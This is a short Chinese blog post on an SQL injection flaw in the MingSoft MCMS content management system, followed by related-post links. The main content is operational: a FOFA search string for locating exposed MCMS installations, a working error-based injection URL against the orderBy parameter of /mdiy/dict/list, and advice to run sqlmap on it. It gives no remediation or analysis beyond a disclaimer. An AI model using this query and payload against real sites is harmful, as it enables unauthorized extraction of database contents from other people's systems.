铭飞 MCMS 存在SQL注入漏洞

于 2024-04-16 00:15:00 发布
阅读量608 收藏
点赞数 12
文章标签: sql 数据库 web安全 铭飞 CMS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wan___she__pi/article/details/137745770
版权

声明:

本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

简介

铭飞(MCMS)是一种计算机管理系统,用于管理和监控计算机网络中的各种设备和资源。MCMS可以帮助管理员轻松地配置、监视和维护网络设备,提供网络拓扑图、设备状态、流量监控、安全性管理等功能。MCMS是一个<完整开源的Java CMS!基于SpringBoot 2架构,前端基于vue、element ui。

MCMS存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息等。

资产搜索

fofa

body="/static/plugins/ms/1.0.0/ms.js"

漏洞复现

http://127.0.0.1/mdiy/dict/list?dict=c&dictType=%E6%96%87%E7%AB%A0%E5%B1%9E%E6%80%A7&orderBy=0%20or%20updatexml(1,concat(0x7e,(SELECT%20md5(233)),0x7e),1)

 

sqlmap跑一梭子

cn_大腿
关注
  • 12
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
铭飞CMS SQL注入漏洞复现(CNVD-2024-06148)
0xSec
04-30 644
由于铭飞CMS文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证,未经身份验证的攻击者可利用该漏洞获取数据库敏感数据,进一步利用可获取服务器权限。
铭飞CMS list 接口 SQL注入漏洞复现
0xSec
12-14 947
铭飞CMS在5.2.10版本以前list 接口处存在sql注入漏洞,能够利用该漏洞获取敏感信息,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
Goby漏洞更新|铭飞 MCMS shiro 反序列化漏洞(CVE-2022-22928)
m0_46699477的博客
04-13 602
铭飞 MCMS shiro 反序列化漏洞(CVE-2022-22928)
1day铭飞mcms-editor-模板注入rce漏洞-未公开Day漏洞复现
weixin_43167326的博客
01-22 616
铭飞基于java开发的一套java cms,也是轻量级开源内容管理系统,CMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业。
CNVD-2024-06148 Mingsoft MCMS v5.2.9 前台查询文章列表接口 SQL注入漏洞分析
最新发布
shelter1234567的博客
04-02 863
MCMS是中国铭飞(MingSoft)公司的一个完整开源的J2ee系统。江西铭软科技有限公司MCMS v5.2.9版本存在SQL注入漏洞,该漏洞源于/content/list.do中的categoryType参数缺少对外部输入SQL语句的验证,攻击者可利用该漏洞获取数据库敏感数据。项目地址参考链接。
铭飞MCMS初次使用教程
weixin_45803331的博客
10-25 2756
铭飞MCMS、MCMS、IDEA
记一次MCMS的审计之路
蚁景网安学院
10-08 1380
MCMS 是 J2EE 系统,完整开源的Java CMS,基于SpringBoot 2架构,前端基于vue、element ui。为开发者提供上百套免费模板,同时提供适用的插件,一套简单好用的开源系统、一整套优质的开源生态内容体系。
安利一个简单快速好用的CMS建站系统
Ellis_li 的博客
10-15 7973
铭飞CMS系统快速建站铭飞CMS介绍代码下载运行模板后台系统提供的模板自己制作模板标签通用全局 ms:global栏目列表 ms:channel文章列表 ms:arclist 铭飞CMS介绍 码云GVP开源项目:https://gitee.com/mingSoft/MCMS 铭飞官网:http://ms.mingsoft.net/ MCMS可以用来快速简单的建站,后台提供了一些各个行业的网页模板,...
铭飞MCMS源码部署
MARS_ZORO的博客
05-24 2977
文章目录前言一、下载铭飞源码二、部署源码1.使用IDEA打开源码2.配置tomcat环境2.1下载tomcat并测试是否可以成功启动(此处不赘述)2.2在IDEA中安装tomcat环境并配置3.添加数据库,并配置3.1新建数据库3.2 导入sql配置三、启动测试 前言 铭飞MCMS基于IDEA、tomcat和mysql的环境搭建。 提示:以下是本篇文章正文内容,下面案例可供参考 一、下载铭飞源码 gitee:https://gitee.com/mingSoft/MCMS/releases(各种版本按需下
铭飞MCms不建议使用
lixiangchibang的博客
11-06 2834
铭飞MCms不建议使用
百度地图开发java源码-MCMS_MyDocs:铭飞MCMS的入手使用教程(自用,也非常欢迎PR)
06-06
MCMS 从使用到开发 MCMS 使用 html 模板开发、JavaWeb Spring 开发 API/MVC 的方式,并且能够实现全站静态化生成纯html css js 各种手册,请在导航栏 或商店插件说明页 上找。 本仓库说明 本人以 Java 开发人员视角...
MCMS铭飞cms建站系统-其他
06-12
MCMS铭飞cms建站系统完整开源!基于SpringBoot 2架构,前端基于vue、element ui。每月28定期更新版本,为开发者提供上百套免费模板,同时提供适用的插件(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、...
MCMS铭飞内容管理系统 v4.7.2
08-22
【MCMS铭飞内容管理系统 v4.7.2】是一个基于Java企业级开发框架J2EE构建的内容管理系统。这个系统的核心特点是它的开源性质,允许开发者深入研究和自定义功能,以满足不同用户的需求。100%的源代码开放使得社区能够...
MCMS铭飞内容管理系统源代码
03-18
铭飞是一个J2EE系统!团队希望看到更多的优秀好用的开源系统: 系统100%开源 模块化开发模式,铭飞所开发的模块都发布到了maven中央库。 可以通过pom.xml文件的方式拉取源代码 特点 免费完整开源:基于MIT协议,源...
MCMS铭飞内容管理系统-其他
06-12
文档丰富:为了让用户更快速的使用MCms系统进行开发,铭飞团队持续更新开发相关文档,如标签文档、使用文档、视频教程等; 开发环境 建议开发者使用以下环境,这样避免版本带来的问题 Windows、Linux Eclipse、Idea ...
【审计思路】如何快速定位SQLMS注入漏洞
kali_Ma的博客
12-18 1713
MCMS是政府、教育等其他行业常用的CMS,应用广泛,但是底层的代码中仍然遗留不少的问题。这篇文章主要针对SQL注入进行审计并探讨如何快速定位SQL注入漏洞,以及其他工具的应用。MCMS,是完整开源的Java CMS!基于SpringBoot 2架构,前端基于vue、element ui。每两个月收集issues问题并更新版本,为开发者提供上百套免费模板,同时提供适用的插件(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等…),一套简单好用的开源系统、一整套优质的开源生态内容体系。
漏洞复现】(1day)铭飞mcms-editor-模板注入rce漏洞复现
weixin_56297026的博客
12-27 627
fofa语法:app="铭飞/MCMS"
cms漏洞复现-前台任意用户密码修改漏洞
yummy11111的博客
07-21 397
cms漏洞复现
java拦截器防止sql注入
12-27
在Java中,可以使用拦截器来防止SQL注入攻击。下面是两种常见的方法: 方法一:使用过滤器 在web.xml文件中配置一个过滤器,该过滤器可以拦截所有以".do"结尾的URL,并对请求参数进行检查,防止SQL注入攻击。 ```xml <!-- 防止SQL注入的过滤器 --> <filter> <filter-name>sqlInjectionFilter</filter-name> <filter-class>com.suning.mcms.web.auth.filter.SqlInjectionFilter</filter-class> </filter> <filter-mapping> <filter-name>sqlInjectionFilter</filter-name> <url-pattern>*.do</url-pattern> </filter-mapping> ``` 方法二:使用自定义拦截器类 创建一个实现了javax.servlet.Filter接口的自定义拦截器类,然后在init方法中获取UsersService的实例,并进行相应的处理。 ```java public class WeiXinFilter implements Filter { private UsersService usersService; public void init(FilterConfig fConfig) throws ServletException { ServletContext sc = fConfig.getServletContext(); XmlWebApplicationContext cxt = (XmlWebApplicationContext)WebApplicationContextUtils.getWebApplicationContext(sc); if(cxt != null && cxt.getBean("usersService") != null && usersService == null) usersService = (UsersService) cxt.getBean("usersService"); } // 其他方法省略... } ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值